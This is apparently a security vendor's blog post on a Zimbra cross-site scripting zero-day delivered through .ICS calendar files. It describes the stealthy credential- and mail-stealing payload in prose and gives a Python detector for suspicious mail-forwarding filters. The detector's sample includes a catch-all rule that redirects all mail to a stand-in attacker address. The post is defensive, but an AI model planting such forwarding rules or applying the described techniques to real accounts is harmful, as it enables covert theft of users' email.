At TecnetOne, we want to keep you informed about the latest cybersecurity threats so you can better protect your digital infrastructure. This time, the focus is on Zimbra Collaboration Suite (ZCS), a widely used platform for email and business collaboration, which was recently targeted in a rather stealthy zero-day attack.
It all began when researchers detected unusually large calendar files with the .ICS extension. These files (commonly known as iCalendar) are standard formats used for scheduling meetings, events, or tasks, and are easily exchanged between applications like Outlook, Google Calendar, or Apple Calendar.
What’s concerning is that malicious actors managed to use these files as a vehicle for an attack. They exploited a vulnerability identified as CVE-2025-27915, a cross-site scripting (XSS) flaw present in Zimbra versions 9.0, 10.0, and 10.1. Through this flaw, attackers injected JavaScript code into .ICS files and sent them to targeted systems. The result? They could execute malicious scripts directly in the victim’s browser—without raising suspicion.
The root of the vulnerability lies in poor validation of HTML content within .ICS files. This flaw allowed attackers to execute malicious JavaScript directly in the user's session, giving them the ability to, for example, create filters that redirected emails to accounts under their control.
Zimbra addressed this security gap on January 27 by releasing patches for ZCS versions 9.0.0 P44, 10.0.13, and 10.1.5. However, the official announcement did not mention that the vulnerability was already being actively exploited.
Shortly thereafter, it was discovered that attackers had started leveraging this flaw as early as January, weeks before the patch was made available. The key clue emerged from analyzing .ICS files larger than 10 KB, which contained hidden JavaScript code fragments—highly unusual for this type of file.
In one of the detected campaigns, the threat actor impersonated the Protocol Office of the Libyan Navy through a seemingly legitimate email that included a zero-day exploit targeting a military organization in Brazil. It was a carefully crafted attack that demonstrates the sophistication and targeted nature of these threats.
Malicious Email Sent by the Attackers (Source: StrikeReady)
The malicious email included an almost empty .ICS file (0 KB), but with a hidden surprise inside: obfuscated JavaScript code using Base64 encoding—a common technique to conceal the true intent of the code and evade detection systems.
Deobfuscating the JavaScript Payload
After analyzing the infected file, researchers discovered that the payload was specifically designed to steal sensitive data from Zimbra Webmail. Among the compromised information were login credentials, emails, contacts, and even shared folders.
The JavaScript code used was highly sophisticated. It was obfuscated using Base64 and executed asynchronously, leveraging functions that automatically trigger on load (known as IIFE, or Immediately Invoked Function Expressions). This gave the malware stealthy behavior that was difficult to detect. According to the analysis, the script could:
Create hidden fields to capture usernames and passwords.
Steal credentials directly from login forms.
Monitor user activity (mouse and keyboard movements) and log out the session after a period of inactivity to trigger data theft.
Use Zimbra's SOAP API to search for folders and extract emails.
Exfiltrate emails to the attacker, repeating the process every 4 hours.
Create a filter named “Mail” that forwards all incoming messages to an external address (in this case, a ProtonMail account).
Steal and send copies of authentication and backup data.
Extract contacts, distribution lists, and shared folders from the compromised user.
Introduce a 60-second delay before executing the script to avoid suspicion.
Apply a 3-day “time gate” to ensure it doesn’t run again until that period has passed, maintaining a low profile.
Hide certain visual elements in the Zimbra user interface, reducing visible signs that something is wrong.
This is not a generic attack. It’s surgically designed to operate undetected, extract critical information, and maintain persistence within the victim's system.
While the attack has not been definitively attributed to a specific group, researchers agree that very few actors have the capability to discover and exploit zero-day vulnerabilities in widely used platforms like Zimbra.
Although no official attribution has been made, a Russian-origin group with a history of similar advanced campaigns has been mentioned. Moreover, some of the tactics, techniques, and procedures (TTPs) observed align with those previously used by UNC1151, a threat group linked to the Belarusian government according to earlier industry reports.
At TecnetOne, we always recommend acting proactively at the first sign of suspicious activity—even if attacks haven’t yet spread on a large scale. Prevention remains the best defense.
To protect your systems against this type of advanced threat, we suggest taking the following key measures:
Review existing mail filters for unusual rules or unauthorized changes that may be covertly forwarding messages.
Ensure you are running the latest version of your email and collaboration platform. Security patches addressing this vulnerability are already available and should be applied as soon as possible.
Inspect your message store and analyze any .ICS files containing Base64-encoded content. These types of files are uncommon and could be hiding malicious payloads.
Monitor network traffic, especially outbound connections to unknown or unusual external servers, as these may indicate data exfiltration or other malicious activity.
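The first measure, reviewing mail filters for covert forwarding, can be scripted. Zimbra stores each user's filter rules as a Sieve script in the account attribute zimbraMailSieveScript, which an administrator can read with zmprov (for example, getAccount on the user); that export step is assumed here and not shown. The reviewer below is an added example written for this article, not code from TecnetOne or Zimbra. It splits the script into named rules, reports every redirect action that sends mail to a domain outside the organization, matches every message (an empty :contains test), or carries the rule name "Mail" reported in the campaign. The Sieve text and the internal-domain list are constructed for the example.

```python
import re

# Assumption: the organization's own mail domains. Redirects elsewhere are external.
INTERNAL_DOMAINS = {"corp.example"}

# Assumption: the rule name the campaign used, per the article.
SUSPICIOUS_NAMES = {"mail"}

# Constructed sample in the shape Zimbra writes user filter rules: a "# <rule name>"
# comment precedes each rule. Addresses and rule bodies are invented for the example.
SAMPLE_SIEVE = """\
require ["fileinto", "reject", "tag", "flag"];

# Receipts
if anyof (header :contains "subject" "receipt") {
    fileinto "Receipts";
    stop;
}
# Mail
if anyof (header :contains "from" "") {
    redirect "drop@attacker.example";
    stop;
}
# Team
if anyof (header :contains "to" "team@corp.example") {
    redirect "archive@corp.example";
}
"""

RULE_SPLIT = re.compile(r"^#\s*(.+?)\s*$", re.M)
REDIRECT = re.compile(r'\bredirect\s+(?::copy\s+)?"([^"]+)"')
# A :contains test against the empty string matches every message.
CATCH_ALL = re.compile(r'header\s+:contains\s+"[^"]*"\s+""')


def split_rules(script: str) -> list[tuple[str, str]]:
    """Return (rule_name, rule_body) pairs from a Zimbra-style Sieve script."""
    parts = RULE_SPLIT.split(script)
    # parts = [preamble, name1, body1, name2, body2, ...]
    return list(zip(parts[1::2], parts[2::2]))


def review_filters(script: str, internal_domains=INTERNAL_DOMAINS) -> list[dict]:
    """Flag redirect rules that are external, catch-all, or carry a known-suspicious name."""
    findings = []
    for name, body in split_rules(script):
        for addr in REDIRECT.findall(body):
            domain = addr.rsplit("@", 1)[-1].lower()
            external = domain not in internal_domains
            catch_all = CATCH_ALL.search(body) is not None
            suspicious_name = name.strip().lower() in SUSPICIOUS_NAMES
            if external or catch_all or suspicious_name:
                findings.append({
                    "rule": name,
                    "redirect_to": addr,
                    "external": external,
                    "catch_all": catch_all,
                    "suspicious_name": suspicious_name,
                })
    return findings


if __name__ == "__main__":
    for finding in review_filters(SAMPLE_SIEVE):
        print(finding)
```

Run against every mailbox export, the script surfaces only the "Mail" rule in the sample: it redirects to an external domain, fires on every message, and uses the reported rule name. The "Team" rule also redirects, but to an internal address under a narrow condition, so it is left for a human to judge rather than reported. Treat any redirect to an address the user cannot explain as a reason to reset credentials and pull the account's SOAP and login activity, since the same script that plants the rule also harvests mail through the API.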
At TecnetOne, we’re committed to helping you keep your systems secure and up to date. Our team is ready to advise you, review your environments, and assist with implementing effective protection measures against threats like this one. If you have any questions or need support, don’t hesitate to contact us.